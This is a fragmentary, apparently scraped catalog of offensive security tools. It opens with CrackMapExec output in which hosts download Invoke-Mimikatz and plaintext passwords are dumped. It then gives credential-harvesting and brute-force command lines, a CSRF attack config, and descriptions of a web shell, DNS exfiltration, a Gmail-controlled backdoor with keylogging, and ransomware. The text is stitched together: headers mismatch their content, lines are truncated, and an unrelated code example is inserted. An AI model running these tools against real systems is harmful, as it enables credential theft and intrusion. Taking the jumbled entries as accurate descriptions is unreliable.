[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
SHARE   Permissions
-----   -----------
ADMIN$  READ, WRITE
IPC$    NO ACCESS
C$      READ, WRITE

SHARE   Permissions
-----   -----------
Users   READ, WRITE
ADMIN$  READ, WRITE
IPC$    NO ACCESS
C$      READ, WRITE

SHARE   Permissions
-----   -----------
Users   READ, WRITE
ADMIN$  READ, WRITE
IPC$    NO ACCESS
C$      READ, WRITE
… Mimikatz.ps1 HTTP/1.1" 200
172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200
172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200
172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/1.1" 200
[+] 172.16.206.133 Found plain text creds! Domain: drugoutcove-pc Username: drugdealer Password: IloveMETH!@$
[*] 172.16.206.133 Saved POST data to Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/1.1" 200
[*] 172.16.206.130 Saved POST data to Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/1.1" 200
[+] 172.16.206.132 Found plain text creds! Domain: drugcompany-PC Username: drugcompany Password: IloveWEED!@#
[+] 172.16.206.132 Found plain text creds! Domain: DRUGCOMPANY-PC Username: drugdealer Password: D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to Mimikatz-172.16.206.132-2015-08-19_18:57:48.log
Let's spider the C$ share, starting from the Users folder, for the pattern "password" in all files and directories (concurrently):
#~ python crackmapexec.py -t 150 172.16.206.0/24 -u username -p password --spider Users --depth 10 --pattern password
Download CrackMapExec
CREDCRACK - FAST AND STEALTHY CREDENTIAL
HARVESTER
  … remote IP(s)
  -l LHOST, --lhost LHOST        Local host IP to launch scans from.
  -t THREADS, --threads THREADS  Number of threads (default: 10)
Required:
  -d DOMAIN, --domain DOMAIN     Domain or Workstation
  -u USER, --user USER           Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Examples
----------------------------------------------------------------
\\192.168.1.102\ADMIN$
OPEN
\\192.168.1.102\C$
\\192.168.1.103\ADMIN$
OPEN
\\192.168.1.103\C$
CLOSED
\\192.168.1.103\F$
CLOSED
\\192.168.1.100\ADMIN$
CLOSED
\\192.168.1.100\C$
OPEN
\\192.168.1.100\NETLOGON
OPEN
\\192.168.1.100\SYSVOL
Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
DownloadCredCrack
CREDMAP - THE CREDENTIAL MAPPER
  -v/--verbose
  -u/--username=USER..
  -p/--password=PASS..
  -e/--email=EMAIL
  -l/--load=LOAD_FILE    … format USER:PASSWORD
  -x/--exclude=EXCLUDE
  -o/--only=ONLY
  -s/--safe-urls
  -i/--ignore-proxy
  --proxy=PROXY          (e.g. "socks5://192.168.1.2:9050")
  --list
EXAMPLES
./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
PREREQUISITES
VIDEO
Downloadcredmap
CROUTON - CHROMIUM OS UNIVERSAL CHROOT
ENVIRONMENT
add it. You can see the list of available targets by running sh
~/Downloads/crouton -t help.
Once you've set up your chroot, you can easily enter it using
the newly-installed enter-chroot command, or one of the
target-specific start* commands. Ta-da! That was easy.
Read more here.
DownloadCrouton
CROWBAR - BRUTE FORCING TOOL FOR PENTESTS
Installation
DownloadCrowbar
First, clone it:
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here.
Go into the directory and install all the dependencies:
npm install
More information
The idea is to provide a 'basic' folder hierarchy for your projects. I made the script quite modular, so your configuration files, malicious forms, etc. don't have to be in those folders. This is more of a good practice/advice for your future projects.
However, here is a little summary of those folders:
conf folder: add your JSON configuration file with your configuration.
… your forms
… attacks
lib: libs specific for my project (custom ones)
utils: folder containing utils such as csrft_utils.py, which will launch CSRFT directly.
server.js file - the HTTP server
{
  "audit": {
    "name": "PoC done with Automatic Tool",
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt",
            "method": "GET",
            "type_attack": "dico",
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}
You can now define some "steps", different attacks that will be
executed in a certain order.
Use cases
Download CSRFT
CUPP - COMMON USER PASSWORDS PROFILER
  … this menu
  -i    … profiling
  -w    … dictionary, or WyD.pl output to make some pwnsauce :)
  -l
  -a
Configuration
DownloadCupp
CUSTOM-SSH-BACKDOOR - SSH BACKDOOR USING
PARAMIKO
DownloadCustom-SSH-Backdoor
DAMN VULNERABLE WEB APP - PHP/MYSQL TRAINING
There are multiple things that make DAws better than every Web Shell out there:
1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed. For example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for
2.
3.
4.
5.
6.
7.
Extra Info
Eval Form:
`include` is used instead of PHP `eval` to bypass Protection Systems.
Download from Link - Methods:
PHP Curl
File_put_content
Zip - Methods:
Linux:
Zip
Windows:
Vbs Script
Shells and Tools:
Extra:
`nohup`, if installed, is automatically used for
background processing.
DownloadDAws
DHARMA - A GENERATION-BASED, CONTEXT-FREE
GRAMMAR FUZZER
None
Examples
Grammar Cheatsheet
Comment
%%% comment
Controls
%const% name := value
Sections
%section% := value
%section% := variable
%section% := variance
Extension methods
%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)
%repeat%(+variable+)
%repeat%(+variable+, ", ")
%uri%(path)
%uri%(lookup_key)
%block%(path)
%choice%(foo, "bar", 1)
Assigning values
digit :=
%range%(0-9)
sign :=
+
value :=
+sign+%repeat%(+digit+)
Using values
+value+
Assigning variables
variable :=
@variable@ = new Foo();
Using variables
value :=
!variable!.bar();
DownloadDharma
DIRS3ARCH V0.3.0 - HTTP(S) DIRECTORY/FILE BRUTE
FORCER
Windows XP/7/8
GNU/Linux
MacOSX
Features
Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Detect not found web pages when 404 not found errors
are masked (.htaccess, web.config, etc).
Recursive brute forcing
HTTP(S) proxy support
Batch processing (-L)
Examples
Scan recursively:
python3 dirs3arch.py -u http://www.example.com/admin/ -e php -r
192.168.1.1
Batch processing:
python3 dirs3arch.py -L urllist.txt -e php
Third-party code
colorama
oset
urllib3
sqlmap
Changelog
DownloadDirs3arch
DISCOVER - CUSTOM BASH SCRIPTS USED TO
AUTOMATE VARIOUS PENTESTING TASKS
For use with Kali Linux. Custom bash scripts used to automate
various pentesting tasks.
Download, setup & usage
cd /opt/discover/
./setup.sh
./discover.sh
RECON
1. Domain
2. Person
3. Parse salesforce
SCANNING
4.
5. CIDR
6. List
7. IP or domain
WEB
8. Open multiple tabs in Iceweasel
9. Nikto
10. SSL
MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit

RECON - Domain
1. Passive
2. Active
3. Previous menu

RECON - Person
First name:
Last name:

RECON - Parse salesforce
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.
Enter the location of your list:

SCANNING
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu

1. External
2. Internal
3. Previous menu
External scan will set the nmap source port to 53 and the max-rtt-timeout to 1500ms.
Internal scan will set the nmap source port to 88 and the max-rtt-timeout to 500ms.
Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
Matching nmap scripts are used for additional enumeration.
Matching Metasploit auxiliary modules are also leveraged.

WEB - Open multiple tabs in Iceweasel
Open multiple tabs in Iceweasel with:
1. List
2.
3. Previous menu

WEB - Nikto
1. List of IPs.
2. List of IP:port.
3. Previous menu

WEB - SSL
Check for SSL certificate issues.
Enter the location of your list:

MISC - Crack WiFi
Crack wireless networks.

MISC - Parse XML
Parse XML to CSV.
1. Burp (Base64)
2. Nessus
3. Nexpose
4. Nmap
5. Qualys
6. Previous menu
Download Discover
DNSTEAL - DNS EXFILTRATION TOOL FOR STEALTHILY
SENDING FILES OVER DNS REQUESTS
This is a fake DNS server that allows you to stealthily extract
files from a victim machine through DNS requests.
Below is an image showing an example of how to use:
DownloadDNSteal
DOMI-OWNED - TOOL USED FOR COMPROMISING IBM/
LOTUS DOMINO SERVERS
USAGE
A valid username and password are not required unless 'names.nsf' and/or 'webadmin.nsf' requires authentication.
FINGERPRINTING
… authentication.
If a username and password are given, Domi-Owned will check whether that account can access 'names.nsf' and 'webadmin.nsf' with those credentials.
REVERSE BRUTEFORCE
…, a password with -p, and the --bruteforce flag. This prints the results to the screen and writes them to separate output files depending on the hash type (Domino 5, Domino 6, Domino 8).
QUICK CONSOLE
… to quit the Quick Console interpreter, which will also delete the 'log.txt' output file.
EXAMPLES
FINGERPRINT DOMINO SERVER
DownloadDomi-Owned
DOUBLE THE BANG FOR YOUR BUCK WITH ACUNETIX
VULNERABILITY SCANNER
Joomla.
    https://www.example.org/sites/all/modules/pathauto/LICENSE.txt
    https://www.example.org/sites/all/modules/pathauto/API.txt
libraries https://www.example.org/sites/all/modules/libraries/
    https://www.example.org/sites/all/modules/libraries/CHANGELOG.txt
    https://www.example.org/sites/all/modules/libraries/README.txt
    https://www.example.org/sites/all/modules/libraries/LICENSE.txt
entity https://www.example.org/sites/all/modules/entity/
    https://www.example.org/sites/all/modules/entity/README.txt
    https://www.example.org/sites/all/modules/entity/LICENSE.txt
google_analytics https://www.example.org/sites/all/modules/google_analytics/
    https://www.example.org/sites/all/modules/google_analytics/README.txt
    https://www.example.org/sites/all/modules/google_analytics/LICENSE.txt
ctools https://www.example.org/sites/all/modules/ctools/
    https://www.example.org/sites/all/modules/ctools/CHANGELOG.txt
    https://www.example.org/sites/all/modules/ctools/LICENSE.txt
    https://www.example.org/sites/all/modules/ctools/API.txt
features https://www.example.org/sites/all/modules/features/
    https://www.example.org/sites/all/modules/features/CHANGELOG.txt
    https://www.example.org/sites/all/modules/features/README.txt
    https://www.example.org/sites/all/modules/features/LICENSE.txt
    https://www.example.org/sites/all/modules/features/API.txt
[... snip for README ...]
[+] Scan finished (0:04:59.502427 elapsed)
Why not X?
Because droopescan:
is fast
is stable
is up to date
allows simultaneous scanning of multiple sites
is 100% python
Installation
Scan types.
Droopescan aims to be the most accurate by default, while not overloading the target server with excessive concurrent requests. Because of this, by default a large number of requests will be made with four threads; change these settings with the --number and --threads arguments respectively.
This tool is able to perform four kinds of tests. By default all tests are run, but you can specify one of the following with the -e or --enumerate flag:
p -- Plugin checks: Performs several thousand HTTP requests and returns a listing of all plugins found to be installed on the target host.
t -- Theme checks: As above, but for themes.
v -- Version checks: Downloads several files and, based on the checksums of these files, returns a list of all possible versions.
i -- Interesting url checks: Checks for interesting urls (admin panels, readme files, etc.)
More notes regarding scanning can be found here.
Target specification
You can also omit the drupal argument. This will trigger CMS
identification, like so:
droopescan scan -u example.org
{
  "example.org": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/sites\/all\/modules\/views\/",
        "name": "views"
      },
      [...snip...]
    ]
  }
}
Download Droopescan
DSHELL - NETWORK FORENSIC ANALYSIS FRAMEWORK
Prerequisites
Installation
python-
decode -h
decode -d <decoder>
Usage Examples
192.168.170.8:32795 -> … 66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 30144 A? www.netbsd.org / A: … **
192.168.170.8:32795 -> … CNAME: www.l.google.com **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** … NXDOMAIN **
dns 2005-03-30 03:52:17 192.168.170.8:32796 <- 192.168.170.20:53 ** … localhost **
dns 2005-03-30 03:52:25 192.168.170.56:1711 <- 217.13.4.24:53 ** 30307 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:52:17 192.168.170.56:1710 <- 217.13.4.24:53 ** 53344 A? GRIMM.utelsystems.local / NXDOMAIN **
[Sample output (HTTP response body): an Apache "Index of /" directory listing with entries doc/, pruef.pdf, Efficient_Video_on_demand_over_Multicast.pdf, Welcome Stranger!!! and cisco_ccna_640-801_command_reference_guide.pdf]
[Sample netflow decoder output: UDP flows from 192.168.1.2 to 202.232.205.123 on ports 33435-33438 (2006-08-25 capture) and UDP flows from 131.151.x.x hosts to 255.255.255.255 and subnet broadcast addresses on ports 520, 137, 138 and 201 (1999-11-05 capture); columns are timestamp, source -> destination, protocol, ports, bytes and duration]
Download Dshell
EGRESS-ASSESS - TOOL USED TO TEST EGRESS DATA
DETECTION CAPABILITIES
Usage
Now, to have the client connect and send data to the ftp server,
you could run...
./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn
DownloadEgress-Assess
EMPIRE - POWERSHELL POST-EXPLOITATION AGENT
Once you hit the main menu, you'll see the number of active agents, listeners, and loaded modules.
The help command should work for all menus, and almost everything that can be tab-completable is (menu commands, agent names, local file paths where relevant, etc.).
You can ctrl+C to rage quit at any point. Starting Empire back up should preserve existing communicating agents, and any existing listeners will be restarted (as their config is stored in the sqlite backend database).
Listeners 101
… can also use domain names here). The port will automatically be pulled out, and the backend will detect if you're doing a HTTP or HTTPS listener. For HTTPS listeners, you must first set the CertPath to be a local .pem file. The provided ./data/cert.sh script will generate a self-signed cert and place it in ./data/empire.pem.
Set the optional WorkingHours, KillDate, DefaultDelay, and DefaultJitter for the listener, as well as whatever name you want it to be referred to as. You can then type execute to start the listener. If the name is already taken, a nameX variant will be used, and Empire will alert you if the port is already in use.
Stagers 101
DownloadEmpire
EVIL FOCA - MITM, DOS, DNS HIJACKING IN IPV4 AND
IPV6 PENETRATION TESTING TOOL
Windows XP or later.
.NET Framework 4 or later.
Winpcap library (http://www.winpcap.org)
DownloadEvil FOCA
EXPLOIT PACK - OPEN SOURCE SECURITY PROJECT
FOR PENETRATION TESTING AND EXPLOIT
DEVELOPMENT
Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer
plugins
Fixes:
* Debian install
* Saving objects without parent
* Visual fixes on Firefox
DownloadFaraday 1.0.15
FARADAY 1.0.16 - COLLABORATIVE PENETRATION TEST
AND VULNERABILITY MANAGEMENT PLATFORM
ever!
This release also features several new features developed
entirely by our community.
Changes:
/bin/getAllIpsNotServices.py
- get all IP addresses that have a defined open port (/bin/getAllbySrv.py) and get all IPs from targets without services (/bin/delAllVulnsWith.py)
It's important to note that both these scripts hold a variable that you can modify to alter their behaviour. /bin/getAllbySrv.py has a port variable set to 8080 by default. /bin/delAllVulnsWith.py does the same with a RegExp.
* Added three Plugins:
- Immunity Canvas
Canvas configuration
- Dig
- Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under
$HOME/.faraday/data. Affected Plugins:
- amap
- dnsmap
- nmap
- sslcheck
- wcscan
- webfuzzer
- nikto
Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe"
strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors
DownloadFaraday1.0.16
FARADAY V1.0.7 - INTEGRATED PENETRATION-TEST
ENVIRONMENT A MULTIUSER PENETRATION TEST IDE
DownloadFaraday
FASTNETMON - VERY FAST DDOS ANALYZER WITH
SFLOW/NETFLOW/MIRROR SUPPORT
Supported platforms:
DownloadFastNetMon
FING - FIND OUT WHICH DEVICES ARE CONNECTED TO
YOUR WI-FI NETWORK
seconds.
Wake On LAN: Switch on your devices from your mobile
or tablet!
Ping and traceroute: Understand your network performance.
Automatic DNS lookup and reverse lookup
Checks the availability of Internet connection
Works also with hosts outside your local network
Tracks when a device has gone online or offline
Launch Apps for specific ports, such as Browser, SSH,
FTP
Displays NetBIOS names and properties
Displays Bonjour info and properties
Supports identification by IP address for bridged networks
Sort by IP, MAC, Name, Vendor, State, Last Change.
Free of charge, no banner Ads
Available for iPhone, iPad and iPod Touch with retina and
standard displays.
Integrates with Fingbox to sync and backup your
customizations, merge networks with multiple access
points, monitor remote networks via Fingbox Sentinels,
get notifications of changes, and much more.
Fing is available on several other platforms, including
Windows, OS X and Linux. Check them out!
DownloadFing
FIREFOX AUTOCOMPLETE SPY - TOOL TO VIEW OR
DELETE AUTOFILL DATA FROM MOZILLA FIREFOX
Field Name
Value
Total Used Count
First Used Date
Last Used Date
How to Use
you to recover the master password and get back all the signon information.
Internals of FireMaster
[-d -f ] [-h -f -n -g "charlist" [-s | -p]] [-b -m -l -c "charlist" -p "pattern"]
  -f    … passwords.
Hybrid crack can find passwords like pass123, 123pass etc
  -f
  -g    … strings
  -n    … word (pass123)
  -p    … word (123pass)
Brute Force Crack Options:
  -b
  -c    … process
  -m
  -l
  -p
Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s auto
// Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my test\firefox"
// Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" auto
Download FireMaster
FIREMASTERCRACKER - FIREFOX MASTER PASSWORD
CRACKING SOFTWARE
DownloadFireMasterCracker
FIREPASSWORD - FIREFOX USERNAME & PASSWORD
RECOVERY TOOL
DownloadFirePassword
FLASHLIGHT - AUTOMATED INFORMATION GATHERING
TOOL FOR PENETRATION TESTERS
VIDEOS :
https://www.youtube.com/watch?v=EUMKffaAxzs&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=4
https://www.youtube.com/watch?v=qCgW-SfYl1c&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=5
https://www.youtube.com/watch?v=98Soe01swR8&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=6
https://www.youtube.com/watch?v=9wft9zuh1f0&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=7
INSTALLATION
apt-get install nmap tshark tcpdump dsniff
1) PASSIVE SCAN
In a passive scan, no packets are sent onto the wire. This type of scan is used for listening to the network and analyzing packets.
To launch a passive scan with Flashlight, a project name should be specified, like passive-pro-01. In the following command, packets captured on eth0 are saved into the "/root/Desktop/flashlight/output/passive-project-01/pcap" directory, whereas pcap files and all logs are saved into the "/root/Desktop/log" directory.
./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /root/Desktop/flashlight_test -l /root/Desktop/log -v
2) ACTIVE SCAN
During an active scan, NMAP scripts are used by reading the
configuration file. An example configuration file (flashlight.yaml)
is stored in config directory under the working directory.
tcp_ports:
- 21, 22, 23, 25, 80, 443, 445, 3128, 8080
udp_ports:
- 53, 161
scripts:
- http-enum
3) SCREEN SCAN
Screen Scan is used to get screenshots of web sites/applications by using directives in the config file (flashlight.yaml). The directives in this file provide a screen scan for four ports ("80, 443, 8080, 8443"):
screen_ports:
- 80, 443, 8080, 8443
A sample screen scan can be performed like this:
./flashlight.py -p project -s screen -d 192.168.74.0/24 -r /usr/local/rasterize.js -t 10 -v
4) FILTERING
The filtering option is used to analyse pcap files. An example for this option is shown below:
./flashlight.py -p filter-project -s filter -f /root/Desktop/flashlight/output/passive-project-02/pcap/20150815072543.pcap -v
By running this command some files are created in the filter sub-folder. This option analyzes PCAP packets according to the properties below:
Windows hosts
Top 10 DNS requests
...
DownloadFlashlight
FORPIX - SOFTWARE FOR DETECTING AFFINE IMAGE
FILES
Download Forpix
FRUITYWIFI V2.2 - WIRELESS NETWORK AUDITING TOOL
- Ethernet <-> Ethernet,
- Ethernet <-> 3G/4G,
- Ethernet <-> Wifi,
- Wifi <-> Wifi,
- Wifi <-> 3G/4G, etc.
Within the new options on the control panel we can change the AP mode between Hostapd and Airmon-ng, allowing the use of more chipsets like Realtek.
It is possible to customize each one of the network interfaces, which allows the user to keep the current setup or change it completely.
Changelog
v2.2
v2.1
DownloadFruityWifi
FTPMAP - FTP SCANNER IN C
COMPILATION
./configure
make
make install
Don't trust this. Script kiddies are just ignoring banners. If they
read that "XYZ FTP software has a vulnerability", they will try
the exploit on all FTP servers they will find, whatever software
they are running. The same thing goes for free and commercial
vulnerability scanners. They are probing exploits to find
potential holes, and they just discard banners and messages.
On the other hand, removing software name and version is
confusing for the system administrator, who has no way to
quickly check what's installed on his servers.
If you want to sleep quietly, the best thing to do is to keep your systems up to date: subscribe to mailing lists and apply vendor patches.
Downloading Ftpmap
git clone git://github.com/Hypsurus/ftpmap
DownloadFTPMap
GCAT - A STEALTHY BACKDOOR THAT USES GMAIL AS
A COMMAND AND CONTROL SERVER
Usage
Gcat
optional arguments:
  -h, --help
  -v, --version         … exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve
  -list
  -info
Commands:
  Commands to execute on an implant
  -cmd CMD
  -download PATH        … system
  -exec-shellcode FILE  … client
  -screenshot           Take a screenshot
  -lock-screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger
x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600SP3-x86
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix  . . . . . . . :
-- SNIP --
-- SNIP --
That's the gist of it! But you can do much more as you can
see from the usage of the script! ;)
Download Gcat
GEOTWEET - SOCIAL ENGINEERING TOOL FOR HUMAN
HACKING
Allows you to search on tags, world zones and user (info and
timeline).
Requirements
Python 2.7
PyQt4, tweepy, geopy, ca_certs_locater, python-instagram
Works on Linux, Windows, Mac OSX, BSD
Installation
git clone https://github.com/Pinperepette/Geotweet_GUI.git
cd Geotweet_GUI
chmod +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py
Video
Download Geotweet
GETHEAD - HTTP HEADER ANALYSIS VULNERABILITY
TOOL
Changelog
Features in Development
DownloadGetHead
GHIRO 0.2 - AUTOMATED DIGITAL IMAGE FORENSICS
TOOL
MAIN FEATURES
Metadata extraction
Metadata are divided in several categories depending on the
standard they come from. Image metadata are extracted and
categorized. For example: EXIF, IPTC, XMP.
GPS Localization
Embedded in the image metadata sometimes there is a geotag,
hash. You can provide a list of hashes and all images matching
are reported.
DownloadGhiro
GITROB - RECONNAISSANCE TOOL FOR GITHUB
ORGANIZATIONS
DownloadGitrob
GOACCESS - REAL-TIME WEB LOG ANALYZER AND
INTERACTIVE VIEWER
GoAccess parses the specified web log file and outputs the
data to the X terminal.
General statistics, bandwidth, etc.
Time taken to serve the request (useful to track pages that
are slowing down your site)
Top visitors
Requested files & static files
404 or Not Found
Download GoAccess
GPING - PING, BUT WITH A GRAPH
visualize the data. I still wanted to just use the command line
though, so I decided to try and write a cross platform one that I
could use. And here we are.
Code
For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot(); this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so there's a big mess of a function called process_colors to try and optimize that. Don't ask.
Download Gping
GRAUDIT - FIND POTENTIAL SECURITY FLAWS IN
SOURCE CODE USING GREP
Perl
PHP
Python
Other (looks for suspicious comments, etc)
USAGE
DEPENDENCIES
-d
database to use
Download Graudit
GRINDER - SYSTEM TO AUTOMATE THE FUZZING OF
WEB BROWSERS
DownloadGrinder
GRYFFIN - LARGE SCALE WEB SECURITY SCANNING
PLATFORM
Coverage
Coverage has two dimensions: one during crawl and the other during fuzzing. In the crawl phase, coverage means finding as much of the application footprint as possible. In the scan phase, or while fuzzing, it means being able to test each part of the application in depth for an applied set of vulnerabilities.
Crawl Coverage
Today a large number of web applications are template-driven,
meaning the same code or path generates millions of URLs.
For a security scanner, it just needs one of the millions of URLs
generated by the same code or path. Gryffin's crawler does just
that.
Page Deduplication
At the heart of Gryffin is a deduplication engine that compares
a new page with already seen pages. If the HTML structure of
the new page is similar to those already seen, it is classified as
a duplicate and not crawled further.
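The structural comparison described above, as an added illustration that is not Gryffin's own code: two pages rendered from the same template share a tag skeleton even when their text and attribute values differ, so a crawler can fingerprint the skeleton of each new page and skip near-copies. The page does not describe Gryffin's actual fingerprint; Jaccard similarity over tag trigrams and the 0.8 threshold used here are assumptions for this example, and the three sample pages are constructed.

```python
"""Structural page deduplication, in the spirit of Gryffin's crawl-coverage idea.

Added illustration, not Gryffin's code.  Similarity is Jaccard over tag trigrams
and the 0.8 threshold is an assumption; both stand in for whatever Gryffin uses.
"""
from html.parser import HTMLParser
from typing import List, Set, Tuple

Shingle = Tuple[str, ...]


class _TagSkeleton(HTMLParser):
    """Records the ordered sequence of tag names, discarding text and attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_endtag(self, tag):
        self.tags.append("/" + tag)


def tag_skeleton(html: str) -> List[str]:
    parser = _TagSkeleton()
    parser.feed(html)
    parser.close()
    return parser.tags


def shingles(tags: List[str], n: int = 3) -> Set[Shingle]:
    """Overlapping n-grams of the tag sequence; a sequence shorter than n is one shingle."""
    if len(tags) <= n:
        return {tuple(tags)}
    return {tuple(tags[i:i + n]) for i in range(len(tags) - n + 1)}


def _jaccard(a: Set[Shingle], b: Set[Shingle]) -> float:
    union = a | b
    return 1.0 if not union else len(a & b) / len(union)


def structure_similarity(html_a: str, html_b: str) -> float:
    """1.0 means an identical tag skeleton; text and attribute changes do not lower it."""
    return _jaccard(shingles(tag_skeleton(html_a)), shingles(tag_skeleton(html_b)))


class PageDeduplicator:
    """Keeps one representative per structural cluster, as a crawl frontier would."""

    def __init__(self, threshold: float = 0.8) -> None:
        self.threshold = threshold
        self.representatives: List[Tuple[str, Set[Shingle]]] = []

    def is_duplicate(self, url: str, html: str) -> bool:
        """True if the skeleton matches a page already seen; otherwise record it as new."""
        sh = shingles(tag_skeleton(html))
        for _seen_url, seen in self.representatives:
            if _jaccard(sh, seen) >= self.threshold:
                return True
        self.representatives.append((url, sh))
        return False


# Constructed sample pages: A and B come from one "item" template, C is a login form.
PAGE_A = """<html><head><title>Widget A</title></head><body>
<div class="nav"><a href="/">Home</a><a href="/shop">Shop</a></div>
<div class="item"><h1>Widget A</h1><p>Price: 10</p><img src="a.png"></div>
</body></html>"""

PAGE_B = """<html><head><title>Widget B</title></head><body>
<div class="nav"><a href="/">Home</a><a href="/shop">Shop</a></div>
<div class="item sale"><h1>Widget B</h1><p>Price: 25</p><img src="b.png"></div>
</body></html>"""

PAGE_C = """<html><head><title>Login</title></head><body>
<form action="/login" method="post"><label>User</label><input name="u">
<label>Pass</label><input type="password" name="p"><button>Go</button></form>
</body></html>"""


def run_demo() -> List[Tuple[str, bool]]:
    """Feed the three pages through the deduplicator in crawl order."""
    dedup = PageDeduplicator()
    return [(url, dedup.is_duplicate(url, html))
            for url, html in (("/item/a", PAGE_A), ("/item/b", PAGE_B), ("/login", PAGE_C))]


if __name__ == "__main__":
    for url, dup in run_demo():
        print(f"{url}: {'duplicate, skip' if dup else 'new structure, crawl'}")
```

Only `/item/a` and `/login` are crawled further; `/item/b` is recognised as the same template and skipped, which is the behaviour the paragraph describes.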
Scale
While Gryffin is available as a standalone package, it's primarily
built for scale.
Gryffin is built on the publisher-subscriber model. Each
component is either a publisher, or a subscriber, or both. This
allows Gryffin to scale horizontally by simply adding more
subscriber or publisher nodes.
Operating Gryffin
Pre-requisites
1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
Run
DownloadGryffin
HEARTBLEED VULNERABILITY SCANNER - NETWORK
SCANNER FOR OPENSSL MEMORY LEAK
(CVE-2014-0160)
Sample usage
Dependencies
Demonstration Video
Usage
Legal Warning
While this may be helpful for some, there are significant risks.
hidden tear may be used only for Educational Purposes. Do not
use it as ransomware! You could go to jail on obstruction of
justice charges just for running hidden tear, even though you
are innocent.
DownloadHidden-tear
HOOK ANALYSER 3.2 - MALWARE ANALYSIS TOOL
Features/Functionality
Release
Network file (PCAP) analysis - Analyses a user-provided .PCAP file and performs analysis on
external IP addresses. Example
Social Intelligence (Pulls data from Twitter for user-defined keywords and performs network analysis).
Example
Important note - The software shall only be used for "NON-COMMERCIAL" purposes. For commercial usage, written
permission from the Author must be obtained prior to use.
HSECSCAN - A SECURITY SCANNER FOR HTTP RESPONSE HEADERS
hsecscan
A security scanner for HTTP response headers.
Requirements
Python 2.x
Usage
$ ./hsecscan.py
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U UserAgent]
-P, --database
database.
-p, --headers
-R, --redirect
Example
$ ./hsecscan.py -u https://google.com
>> RESPONSE INFO <<
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_VuWHqWX8QeHraH4DQ
Code: 200
Headers:
Date: Sun, 08 Nov 2015 14:12:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
